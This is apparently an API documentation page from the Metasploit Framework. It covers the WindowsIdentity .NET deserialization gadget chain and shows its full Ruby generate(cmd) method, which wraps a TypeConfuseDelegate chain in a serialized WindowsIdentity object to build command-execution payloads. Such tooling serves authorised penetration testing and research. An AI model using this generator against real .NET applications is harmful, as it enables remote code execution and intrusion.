Class: Msf::Util::DotNetDeserialization::GadgetChains::WindowsIdentity

Inherits:
Types::SerializedStream show all
Defined in:
lib/msf/util/dot_net_deserialization/gadget_chains/windows_identity.rb

Class Method Summary collapse

Methods inherited from Types::SerializedStream

from_values, #get_object, #set_object

Class Method Details

.generate(cmd) ⇒ Object

WindowsIdentity

Credits:
  Finders: Levi Broderick
  Contributors: Alvaro Munoz, Soroush Dalili

13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# File 'lib/msf/util/dot_net_deserialization/gadget_chains/windows_identity.rb', line 13

def self.generate(cmd)
  inner = GadgetChains::TypeConfuseDelegate.generate(cmd)

  self.from_values([
    Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
    Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
      class_info: Types::General::ClassInfo.new(
        obj_id: 1,
        name: 'System.Security.Principal.WindowsIdentity',
        member_names: %w{ System.Security.ClaimsIdentity.actor }
      ),
      member_type_info: Types::General::MemberTypeInfo.new(
        binary_type_enums: %i{ String },
      ),
      member_values: [
        Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
          obj_id: 2,
          string: Rex::Text.encode_base64(inner.to_binary_s)
        ))
      ]
    ),
    Types::RecordValues::MessageEnd.new
  ])
end